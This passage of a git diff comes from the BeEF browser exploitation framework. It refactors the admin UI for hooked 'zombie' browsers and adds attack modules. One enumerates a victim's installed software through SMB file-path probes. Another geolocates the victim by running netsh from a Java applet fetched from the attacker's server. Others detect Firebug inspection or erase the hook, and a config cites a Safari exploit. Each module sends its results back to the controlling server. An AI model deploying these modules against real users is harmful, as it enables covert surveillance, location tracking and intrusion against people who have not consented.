results << {'rating' => 2, 'const' => k}
end
when Hash
if opts['browser'] == v.keys.first
if opts['browser'] == v.keys.first or v.keys.first == BeEF::Core::Constants::Browsers::ALL
subv = v[v.keys.first]
rating = 1
#version check
@@ -241,14 +244,15 @@ module BeEF
rating += 1
match = true
elsif subv['os'] == BeEF::Core::Constants::Os::OS_ALL_UA_STR
rating += 1
match = true
end
when Array
subv['os'].each{|p|
if o == p or p == BeEF::Core::Constants::Os::OS_ALL_UA_STR
if o == p
rating += 1
match = true
elsif p == BeEF::Core::Constants::Os::OS_ALL_UA_STR
match = true
end
}
end
@@ -257,18 +261,35 @@ module BeEF
break
end
end
if rating != 1
if rating > 0
# if k == BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
# rating += 1
# end
results << {'rating' => rating, 'const' => k}
end
end
end
if v == BeEF::Core::Constants::Browsers::ALL
results << {'rating' => 1, 'const' => k}
rating = 1
if k == BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
rating = 1
end
results << {'rating' => rating, 'const' => k}
end
}
}
if results.count > 0
return results.sort_by {|v| v['rating']}.last['const']
result = {}
results.each {|r|
if result == {}
result = {'rating' => r['rating'], 'const' => r['const']}
else
if r['rating'] > result['rating']
result = {'rating' => r['rating'], 'const' => r['const']}
end
end
}
return result['const']
else
return BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN
end

30
core/ruby/hash.rb
View File

@@ -15,20 +15,20 @@
#
class Hash
# Recursively deep merge two hashes together
# @param [Hash] hash Hash to be merged
# @return [Hash] Combined hash
# @note Duplicate keys are overwritten by the value defined in the hash calling deep_merge (not the parameter hash)
# @note http://snippets.dzone.com/posts/show/4706
def deep_merge(hash)
target = dup
hash.keys.each do |key|
if hash[key].is_a? Hash and self[key].is_a? Hash
target[key] = target[key].deep_merge(hash[key])
next
end
target[key] = hash[key]
end
target
# Recursively deep merge two hashes together
# @param [Hash] hash Hash to be merged
# @return [Hash] Combined hash
# @note Duplicate keys are overwritten by the value defined in the hash calling deep_merge (not the parameter hash)
# @note http://snippets.dzone.com/posts/show/4706
def deep_merge(hash)
target = dup
hash.keys.each do |key|
if hash[key].is_a? Hash and self[key].is_a? Hash
target[key] = target[key].deep_merge(hash[key])
next
end
target[key] = hash[key]
end
target
end
end

24
core/ruby/module.rb
View File

@@ -21,7 +21,7 @@ class Module
classes = []
ObjectSpace.each_object(Class) { |k| classes << k if k.included_modules.include?(self) }
classes.reverse.inject([]) do |unique_classes, klass|
classes.reverse.inject([]) do |unique_classes, klass|
unique_classes << klass unless unique_classes.collect { |k| k.to_s }.include?(klass.to_s)
unique_classes
end
@@ -32,26 +32,8 @@ class Module
def included_in_modules
modules = []
ObjectSpace.each_object(Module) { |k| modules << k if k.included_modules.include?(self) }
modules.reverse.inject([]) do |unique_modules, klass|
unique_modules << klass unless unique_modules.collect { |k| k.to_s }.include?(klass.to_s)
unique_modules
end
end
# Returns the modules extended inside the target module
# @return [Array] Array of modules
def extended_modules
(class << self; self end).included_modules
end
# Returns the modules extending the target module
# @return [Array] Array of modules
def extended_in_modules
modules = []
ObjectSpace.each_object(Module) { |k| modules << k if k.extended_modules.include?(self) }
modules.reverse.inject([]) do |unique_modules, klass|
modules.reverse.inject([]) do |unique_modules, klass|
unique_modules << klass unless unique_modules.collect { |k| k.to_s }.include?(klass.to_s)
unique_modules
end

14
core/ruby/object.rb
View File

@@ -14,35 +14,35 @@
# limitations under the License.
#
class Object
# Returns true if the object is a Boolean
# @return [Boolean] Whether the object is boolean
def boolean?
self.is_a?(TrueClass) || self.is_a?(FalseClass)
self.is_a?(TrueClass) || self.is_a?(FalseClass)
end
# Returns true if the object is a String
# @return [Boolean] Whether the object is a string
def string?
self.is_a?(String)
end
# Returns true if the object is an Integer
# @return [Boolean] Whether the object is an integer
def integer?
self.is_a?(Integer)
end
# Returns true if the object is a hash
# @return [Boolean] Whether the object is a hash
def hash?
self.is_a?(Hash)
end
# Returns true if the object is a class
# @return [Boolean] Whether the object is a class
def class?
self.is_a?(Class)
end
end

38
core/ruby/patches/dm-do-adapter/adapter.rb
View File

@@ -55,27 +55,27 @@ module DataMapper
def normalized_uri
@normalized_uri ||=
begin
keys = [
:adapter, :user, :password, :host, :port, :path, :fragment,
:scheme, :query, :username, :database ]
query = DataMapper::Ext::Hash.except(@options, keys)
query = nil if query.empty?
begin
keys = [
:adapter, :user, :password, :host, :port, :path, :fragment,
:scheme, :query, :username, :database ]
query = DataMapper::Ext::Hash.except(@options, keys)
query = nil if query.empty?
# Better error message in case port is no Numeric value
port = @options[:port].nil? ? nil : @options[:port].to_int
# Better error message in case port is no Numeric value
port = @options[:port].nil? ? nil : @options[:port].to_int
DataObjects::URI.new({
:scheme => @options[:adapter],
:user => @options[:user] || @options[:username],
:password => @options[:password],
:host => @options[:host],
:port => port,
:path => @options[:path] || @options[:database],
:query => query,
:fragment => @options[:fragment]
}).freeze
end
DataObjects::URI.new({
:scheme => @options[:adapter],
:user => @options[:user] || @options[:username],
:password => @options[:password],
:host => @options[:host],
:port => port,
:path => @options[:path] || @options[:database],
:query => query,
:fragment => @options[:fragment]
}).freeze
end
end
end

14
core/ruby/print.rb
View File

@@ -31,10 +31,10 @@ end
# @note This function will only print messages if the debug flag is set to true
# @todo Once the console extension has been merged into the core, remove the extension checks.
def print_debug(s)
config = BeEF::Core::Configuration.instance
if config.get('beef.debug') || (BeEF::Extension.is_loaded('console') && BeEF::Extension::Console.verbose?)
puts Time.now.localtime.strftime("[%k:%M:%S]")+'[>]'.yellow+' '+s.to_s
end
config = BeEF::Core::Configuration.instance
if config.get('beef.debug') || (BeEF::Extension.is_loaded('console') && BeEF::Extension::Console.verbose?)
puts Time.now.localtime.strftime("[%k:%M:%S]")+'[>]'.yellow+' '+s.to_s
end
end
# Function used to print successes to the console
@@ -49,14 +49,14 @@ end
def print_more(s)
time = Time.now.localtime.strftime("[%k:%M:%S]")
lines = s.split("\n")
lines.each_with_index do |line, index|
lines.each_with_index do |line, index|
if ((index+1) == lines.size)
puts "#{time} |_ #{line}"
else
puts "#{time} | #{line}"
end
end
end
end
# Function used to print over the current line

2
core/ruby/string.rb
View File

@@ -18,5 +18,5 @@ class String
# @note Use a gem to colorize the console.
# @note http://flori.github.com/term-ansicolor/
include Term::ANSIColor
end

14
extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
View File

@@ -21,27 +21,25 @@ ZombieTab = function(zombie) {
requester_tab = new ZombieTab_Requester(zombie);
xssrays_tab = new ZombieTab_XssRaysTab(zombie);
//-------------------------------------------
ZombieTab.superclass.constructor.call(this, {
id: zombie.session,
id:"current-browser",
activeTab: 0,
loadMask: {msg:'Loading browser...'},
title: zombie.ip,
title: "Current Browser",
autoScroll: true,
closable: true,
closable: false,
viewConfig: {
forceFit: true,
type: 'fit'
},
items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab]
});
};
Ext.extend(ZombieTab, Ext.TabPanel, {
listeners: {
close: function(panel) {
panel.destroy();
}
activate: function(panel) {},
deactivate: function(panel) {},
close: function(panel) {}
}
});

14
extensions/admin_ui/media/javascript/ui/panel/common.js
View File

@@ -132,7 +132,7 @@ function get_dynamic_payload_details(payload, zombie) {
generate_form_input_field(Ext.getCmp("payload-panel"), input, null, false, zombie);
});
Ext.getCmp("payload-panel").doLayout();
Ext.getCmp("payload-panel").doLayout();
}
})
}
@@ -145,7 +145,7 @@ function get_dynamic_payload_details(payload, zombie) {
* @param: {Object} the targeted Zombie.
* @param: {Object} the status bar.
*/
function genExisingExploitPanel(panel, command_id, zombie, sb) {
function genExistingExploitPanel(panel, command_id, zombie, sb) {
if(typeof panel != 'object') {
Ext.beef.msg('Bad!', 'Incorrect panel chosen.');
return;
@@ -304,7 +304,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
var xgrid = Ext.getCmp('command-module-grid-zombie-'+zombie.session);
var sb = Ext.getCmp('commands-bbar-zombie-'+zombie.session);
panel.removeAll();
if(command_module_name == 'some special command module') {
//HERE we will develop specific panels for the command modules that require it.
} else {
@@ -327,9 +327,8 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
}
module = module.command_modules[1];
panel.removeAll();
var form = new Ext.form.FormPanel({
var form = new Ext.form.FormPanel({
url: submiturl,
id: 'form-command-module-zombie-'+zombie.session,
@@ -394,7 +393,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
bodyBorder: false,
height: 200,
hidden: true,
border: false //we can remove the border of the panel
border: false //we can remove the border of the panel
});
Ext.each(module.Data, function(input){
@@ -402,7 +401,6 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
);
form.add(payload_panel);
panel.add(form);
panel.doLayout();
// hide the load mask after rendering of the config panel is done

14
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js
View File

@@ -77,7 +77,7 @@ ZombieTab_Commands = function(zombie) {
if(!command_id) return;
genExisingExploitPanel(command_module_config, command_id, zombie, commands_statusbar);
genExistingExploitPanel(command_module_config, command_id, zombie, commands_statusbar);
});
LoadCommandPanelEvent = function(node,keyclick) {
@@ -95,7 +95,7 @@ ZombieTab_Commands = function(zombie) {
nonce: Ext.get ("nonce").dom.value
}
});
genNewExploitPanel(command_module_config, node.id, node.text, zombie, commands_statusbar);
commands_statusbar.showValid('Ready');
}
@@ -139,16 +139,12 @@ ZombieTab_Commands = function(zombie) {
'afterrender' : function() {
},
'selectionchange' : function() {
console.log("selection changed");
},
'activate' : function() {
console.log("activate");
},
'select' : function() {
console.log("select");
},
'keyup' : function() {
console.log("Key up");
},
'render' : function(c) {
c.getEl().on('keyup', function() {
@@ -189,4 +185,8 @@ ZombieTab_Commands = function(zombie) {
var sb = Ext.getCmp('command-module-bbar-zombie-'+zombie.session);
};
Ext.extend(ZombieTab_Commands, Ext.Panel, {});
Ext.extend(ZombieTab_Commands, Ext.Panel, {
listeners: {
close: function(panel) {}
}
});

2
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
View File

@@ -102,8 +102,6 @@ ZombieTab_Requester = function(zombie) {
// itemclick: function(item) {
// switch (item.id) {
// case 'do-something':
// console.log("history_panel_context_menu.rowIndex: " + history_panel_context_menu.rowIndex);
// console.log("history_panel_context_menu.dbIndex: " + history_panel_context_menu.dbIndex);
// break;
// }
// }

7
extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
View File

@@ -113,12 +113,13 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
//creates a new hooked browser tab when a hooked browser is clicked
click: function(node, e) {
if(!node.leaf) return;
if(!mainPanel.get(node.attributes.session)) {
mainPanel.remove(mainPanel.getComponent('current-browser'));
if(!mainPanel.getComponent('current-browser')) {
mainPanel.add(new ZombieTab(node.attributes));
}
mainPanel.activate(node.attributes.session);
mainPanel.activate(mainPanel.getComponent('current-browser'));
},
//show the context menu when a HB is right-clicked
contextmenu: function(node, event){

5
extensions/initialization/handler.rb
View File

@@ -81,7 +81,6 @@ module BeEF
# add a log entry for the newly hooked browser
BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
# get and store browser name
browser_name = get_param(@data['results'], 'BrowserName')
if BeEF::Filters.is_valid_browsername?(browser_name)
@@ -274,6 +273,10 @@ module BeEF
self.err_msg "Invalid value for hasPersistentCookies returned from the hook browser's initial connection."
end
# log a few info of newly hooked zombie in the console
print_info "New Hooked Browser [ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
# Call autorun modules
autorun = []
BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|

10
extensions/proxy/proxy.rb
View File

@@ -37,13 +37,19 @@ module BeEF
def handle_request socket
request_line = socket.readline
# HTTP method # defaults to GET
method = request_line[/^\w+/]
url = request_line[/^\w+\s+(\S+)/, 1]
# HTTP version # defaults to 1.0
version = request_line[/HTTP\/(1\.\d)\s*$/, 1]
version = "1.0" if version.nil?
# url # host:port/path
url = request_line[/^\w+\s+(\S+)/, 1]
# We're overwriting the URI::Parser UNRESERVED regex to prevent BAD URI errors when sending attack vectors (see tolerant_parser)
tolerant_parser = URI::Parser.new(:UNRESERVED => BeEF::Core::Configuration.instance.get("beef.extension.requester.uri_unreserved_chars"))
uri = tolerant_parser.parse(url)
uri = tolerant_parser.parse(url.to_s)
raw_request = request_line
content_length = 0

14
extensions/requester/api/hook.rb
View File

@@ -65,16 +65,16 @@ module BeEF
#@note: retrieve HTTP headers values needed later, and the \r\n that indicates the start of the post-data (if any)
req_parts.each_with_index do |value, index|
if value.match(/^Content-Length/)
@content_length = Integer(req_parts[index].split(/: /)[1])
if value.match(/^Content-Length:\s+(\d+)/)
@content_length = Integer(req_parts[index].split(/:\s+/)[1])
end
if value.match(/^Host/)
@host = req_parts[index].split(/: /)[1].split(/:/)[0]
@port = req_parts[index].split(/: /)[1].split(/:/)[1]
@host = req_parts[index].split(/:\s+/)[1].split(/:/)[0]
@port = req_parts[index].split(/:\s+/)[1].split(/:/)[1]
end
if value.eql?("") or value.strip.empty?# this will be the CRLF (before HTTP request body)
if value.eql?("") or value.strip.empty? # this will be the CRLF (before HTTP request body)
@post_data_index = index
end
end
@@ -111,7 +111,7 @@ module BeEF
http_request_object = {
'id' => http_db_object.id,
'method' => verb,
'host' => @host.strip,
'host' => @host,
'port' => @port,
'data' => @post_data,
'uri' => uri,
@@ -123,7 +123,7 @@ module BeEF
http_request_object = {
'id' => http_db_object.id,
'method' => verb,
'host' => @host.strip,
'host' => @host,
'port' => @port,
'uri' => uri,
'headers' => headers,

2
install
View File

@@ -23,7 +23,7 @@ if RUBY_VERSION < '1.9'
puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later."
puts ""
puts "OSX:"
puts "sudo port install ruby19 +nosuffix"
puts "See README"
puts "\n"
exit
end

21
modules/browser/detect_firebug/command.js Normal file
View File

@@ -0,0 +1,21 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var result = "Disabled or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "firebug="+result);
});

26
modules/browser/detect_firebug/config.yaml Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
detect_firebug:
enable: true
category: "Browser"
name: "Detect FireBug"
description: "This module checks if the Mozilla Firefox Firebug extension is being use to inspect the current window."
authors: ["bcoles"]
target:
working: ["FF"]
not_working: ["All"]

24
modules/browser/detect_firebug/module.rb Normal file
View File

@@ -0,0 +1,24 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Detect_firebug < BeEF::Core::Command
def post_execute
content = {}
content['firebug'] = @datastore['firebug'] if not @datastore['firebug'].nil?
save content
end
end

39
modules/browser/unhook/command.js Normal file
View File

@@ -0,0 +1,39 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent unhook request");
// remove script tag(s)
try {
var scripts = document.getElementsByTagName("script");
for (var i=0; i<scripts.length; i++) {
if (scripts[i].src.match(/https?:\/\/[^\/]+\/hook\.js/)) {
scripts[i].parentNode.removeChild(scripts[i]);
}
}
} catch (e) { }
// attempt to clean up DOM
try {
delete beef;
delete BEEFHOOK;
beef_init=null;
BeefJS=null;
} catch (e) { }
});

25
modules/browser/unhook/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
unhook:
enable: true
category: "Browser"
name: "Unhook"
description: "This module removes the BeEF hook from the hooked page."
authors: ["bcoles"]
target:
working: ["All"]

24
modules/browser/unhook/module.rb Normal file
View File

@@ -0,0 +1,24 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Unhook < BeEF::Core::Command
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
save content
end
end

3
modules/exploits/safari_launch_app/config.yaml
View File

@@ -19,8 +19,7 @@ beef:
enable: true
category: "Exploits"
name: "Safari Launch App"
description: "Launch an application from the victim machine.<br/><br/>See CVE-2011-3230 for more details."
notes: "Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel. Also see CVE-2011-3230"
description: "Launch an application from the victim machine.<br/><br/>See CVE-2011-3230 for more details.<br /><br />Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel. Also see CVE-2011-3230"
authors: ["antisnatchor"]
target:
user_notify: ["S"]

7
modules/host/detect_cups/config.yaml
View File

@@ -22,4 +22,9 @@ beef:
description: "This module attempts to detect Common UNIX Printing System (CUPS) on localhost on the default port 631."
authors: ["bcoles"]
target:
working: ["ALL"]
working:
ALL:
os: ["Linux"]
not_working:
ALL:
os: ["All"]

3
modules/host/detect_google_desktop/config.yaml
View File

@@ -22,4 +22,7 @@ beef:
description: "This module attempts to detect Google Desktop running on the default port 4664."
authors: ["bcoles"]
target:
not_working:
ALL:
os: ["iPhone"]
working: ["ALL"]

3
modules/host/detect_protocol_handlers/config.yaml
View File

@@ -19,8 +19,7 @@ beef:
enable: true
category: "Host"
name: "Get Protocol Handlers"
description: "This module attempts to identify protocol handlers present on the hooked browser."
notes: "Only Internet Explorer and Firefox are supported.<br /><br />Firefox users are prompted to launch the application for which the protocol handler is responsible.<br /><br />Firefox users are warned when there is no application assigned to a protocol handler.<br /><br /><br /><br />The possible return values are: unknown, exists, does not exist"
description: "This module attempts to identify protocol handlers present on the hooked browser. Only Internet Explorer and Firefox are supported.<br /><br />Firefox users are prompted to launch the application for which the protocol handler is responsible.<br /><br />Firefox users are warned when there is no application assigned to a protocol handler.<br /><br /><br /><br />The possible return values are: unknown, exists, does not exist."
authors: ["bcoles"]
target:
working: ["IE"]

159
modules/host/detect_software/command.js Normal file
View File

@@ -0,0 +1,159 @@
//
// detect software
//
beef.execute(function() {
var files = [
"Adobe/Reader 9.0/Reader/Tracker/add_reviewer.gif",
"NetWaiting/Logon.bmp",
"Windows NT/Pinball/table.bmp",
"InterVideo/WinDVD/Skins/WinDVD 5/Audio SRS Subpanel/Audio_SRS_Subpanel_Base_Mask.bmp",
"Java/jre1.6.0_02/lib/images/cursors/invalid32x32.gif",
"Common Files/Roxio Shared/9.0/Tutorial/Graphics/archive.gif",
"Windows Sidebar/Gadgets/Weather.Gadget/images/1px.gif",
"Pinnacle/Shared Files/Pixie/Register/hdr_register_1.gif",
"Adobe/Reader 8.0/Reader/BeyondReader/ENU/Onramp/acrobat.gif",
"eFax Messenger 4.3/Media/ENU/confidential.gif",
"InterActual/InterActual Player/help/images/btm_bckg.gif",
"Intuit/QuickBooks 2007/Components/Help/Updates/bolt.gif",
"Java/jre1.5.0_11/lib/images/cursors/win32_CopyDrop32x32.gif",
"Macromedia/Flash 8/en/First Run/HelpPanel/_sharedassets/check.gif",
"Microsoft Dynamics CRM/Client/res/web/_imgs/configure.gif",
"Microsoft Office/Live Meeting 8/Console/Playback/Engine/img/dropdown-arrow.gif",
"Microsoft Visual Studio 8/Common7/IDE/VBExpress/ProjectTemplatesCache/1033/MovieCollection.zip/Documentation/images/side-vb.gif",
"Mozilla Firefox/res/broken-image.gif",
"Mozilla Thunderbird/res/grabber.gif",
"TechSmith/SnagIt 9/HTML_Content/add-in.gif",
"VMware/VMware Player/help/images/collapse.gif",
"WildPackets/OmniPeek Personal/1033/Html/expert-red-yellow-on.gif",
"FreeMind/accessories/hide.png",
"HP/Digital Imaging/Skins/oov1/bc/img/bc-backLogo.png",
"Movie Maker/Shared/news.png",
"MySQL/MySQL Tools for 5.0/images/grt/db/column.png",
"Safari/Safari.resources/compass.png",
"ThinkVantage Fingerprint Software/rsc/logon.png",
"Trillian/plugins/GoodNews/icons/logo.png",
"Trillian/users/default/cache/account-AIM-offline.png",
"VideoLAN/VLC/http/images/delete.png",
"Virtual Earth 3D/Data/Atmosphere.png",
"Windows Media Connect 2/wmc_bw120.png",
"Analog Devices/SoundMAX/CPApp.ico",
"AT&T/Communication Manager/desktop.ico",
"ATI Technologies/ATI.ACE/branding.ico",
"Canon/ZoomBrowser EX/Program/CIGLibDisplayIcon.ico",
"CDBurnerXP Pro 3/Resources/cdbxp.ico",
"DivX/divxdotcom.ico",
"Fiddler/IE_Toolbar.ico",
"HP/SwfScan/SwfScan.ico",
"iPhone Configuration Utility/Document-Config.ico",
"Microsoft Device Emulator/1.0/emulator.ico",
"MSN/MSNCoreFiles/Install/msnms.ico",
"OpenVPN/openvpn.ico",
"Paros/paros_logo.ico",
"Adobe/Photoshop 6.0/Help/images/banner.jpg",
"iTunes/iTunes.Resources/genre-blues.jpg",
"Source Insight 3/images/SubBack.jpg",
"Canon/CameraWindow/MyCameraFiles/VI_JPG/XMAS22_VI01.JPG",
"Microsoft Office/OFFICE11/REFBAR.ICO",
"Microsoft Office/OFFICE12/REFBAR.ICO",
"Windows Media Player/Network Sharing/wmpnss_color48.jpg",
]
var descriptions = [
"Adobe Reader 9.0",
"WinDVD",
"Windows Pinball",
"Conexant NetWaiting",
"JRE 1.6.0_22",
"Roxio 9.0",
"Windows Weather Gadget",
"Pinnacle",
"Adobe Reader 8.0",
"eFax Manager 4.0",
"Interactual Player",
"Quickbooks",
"JRE 1.5.0_11",
"Flash 8",
"Microsoft CRM",
"Microsoft Live Meeting 8",
"Microsoft Visual Studio 8",
"Mozilla Firefox",
"Mozilla Thunderbird",
"Snagit 9",
"VMware Player",
"Omnipeek Personal",
"Freemind",
"HP Digital Imaging",
"Windows Movie Maker",
"MySQL Tools for 5.0",
"Safari",
"ThinkVantage Fingerprint Software",
"Trillian Plugin GoodNews",
"Trillian",
"VideoLAN VLC",
"Microsoft Virtial Earth 3D",
"Windows Media Connect 2",
"SoundMAX",
"AT&T Communications Manager",
"ATI Technologies ATI.ACE",
"Canon ZoomBrowser",
"CDBurnerXP Pro 3",
"DivX",
"Fiddler",
"HP's SwfScan",
"iPhone Configuration Utility",
"Microsoft Device Emulator",
"MSN",
"OpenVPN",
"Paros",
"Adobe Photoshop 6.0",
"iTunes",
"Source Insight 3",
"Canon CameraWindow",
"Microsoft Office 11",
"Microsoft Office 12",
"Windows Media Player"
]
if (navigator.appName != "Microsoft Internet Explorer") {
result = 'Software detection module only works in IE (so far)';
beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result);
// Using IE lets test for smb enum
} else {
var pic1 = new Image();
pic1.src= "file:///\\127.0.0.1/C$/WINDOWS/system32/ntimage.gif";
var pic2 = new Image();
pic2.src= "file:///\\127.0.0.1/C$/Windows/Web/Wallpaper/img1.jpg";
if (pic1.width == 28 && pic2.width == 28) {
result = 'SMB method of detecting software failed';
beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result);
// smb enum is working lets look for installed software
} else {
result = '';
var sixtyfourbitvista = 0;
for (var x = 0; x < files.length; x++) {
var pic1 = new Image();
pic1.src= "file:///\\127.0.0.1/C$/Program Files/" + files[x];
if (pic1.width != 28) {
result += descriptions[x];
result += ' and ';
} else {
pic1.src= "file:///\\127.0.0.1/C$/Program Files (x86)/" + files[x];
if (pic1.width != 28) {
result += descriptions[x];
result += ' and ';
sixtyfourbitvista = 1;
}
}
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result);
}
}
});

13
modules/host/detect_software/config.yaml Normal file
View File

@@ -0,0 +1,13 @@
# detect software
#
beef:
module:
Detect_software:
enable: true
category: "Host"
name: "Detect Software"
description: "Detects software installed on the host (Internet Explorer only)"
authors: ["mh"]
target:
working: ["IE"]
not_working: ["All"]

12
modules/host/detect_software/module.rb Normal file
View File

@@ -0,0 +1,12 @@
# detect software
#
class Detect_software < BeEF::Core::Command
def post_execute
content = {}
content['detect_software'] = @datastore['detect_software']
save content
end
end

30
modules/host/get_physical_location/command.js Executable file
View File

@@ -0,0 +1,30 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
var applet_id = '<%= @applet_id %>';
var applet_name = '<%= @applet_name %>';
var output;
beef.dom.attachApplet(applet_id, 'getGPSLocation', 'getGPSLocation' ,
null, applet_archive, null);
output = document.getGPSLocation.getInfo();
if (output) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'location_info='+output.replace(/\n/g,"<br>"));
}
beef.dom.detachApplet('getGPSLocation');
});

26
modules/host/get_physical_location/config.yaml Executable file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_physical_location:
enable: true
category: "Host"
name: "Get Physical Location"
description: "This module will retrieve geolocation information based on the neighboring wireless access points using commands encapsulated within a signed Java Applet. <br/><br/>The details will include:<br/> <ul><li> - GPS Coordinates details</li><li> - Street Address details</li></ul><br/><br/> If the victim machine has a firewall that monitors outgoing connections (Zonealaram, LittleSnitch, ..), calls to Google maps will be alerted."
authors: ["keith_lee @keith55 http://milo2012.wordpress.com", "antisnatchor"]
target:
working: ["IE"]
user_notify: ["C", "S", "O", "FF"]

BIN
modules/host/get_physical_location/getGPSLocation.class Executable file
View File

Binary file not shown.

BIN
modules/host/get_physical_location/getGPSLocation.jar Executable file
View File

Binary file not shown.

244
modules/host/get_physical_location/getGPSLocation.java Executable file
View File

@@ -0,0 +1,244 @@
import java.io.*;
import java.util.*;
import java.net.*;
import java.applet.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
// Keith Lee
// Twitter: @keith55
// http://milo2012.wordpress.com
// keith.lee2012[at]gmail.com
public class getGPSLocation extends Applet{
public static String result = "";
public getGPSLocation(){
super();
return;
}
public static String getInfo() {
return result;
}
public void init() {
if (isWindows()) {
//System.out.println("This is Windows Machine");
result=getWindows();
} else if (isMac()) {
//System.out.println("This is Mac Machine");
result=getMac();
} else {
//System.out.println("Your OS is not support!!");
}
}
public static String getWindows(){
String result = null;
try {
ArrayList ssidList = new ArrayList();
ArrayList bssidList = new ArrayList();
ArrayList rssiList = new ArrayList();
Process p = Runtime.getRuntime().exec("netsh wlan show networks mode=bssid");
BufferedReader in = new BufferedReader(
new InputStreamReader(p.getInputStream()));
String line = null;
String signal = null;
String ssidStr = null;
while ((line = in.readLine()) != null) {
Pattern p1 = Pattern.compile("(SSID\\s\\d+\\s:)\\s([\\w\\s]*)");
Matcher m1 = p1.matcher(line);
if(m1.find()){
ssidStr = m1.group(2);
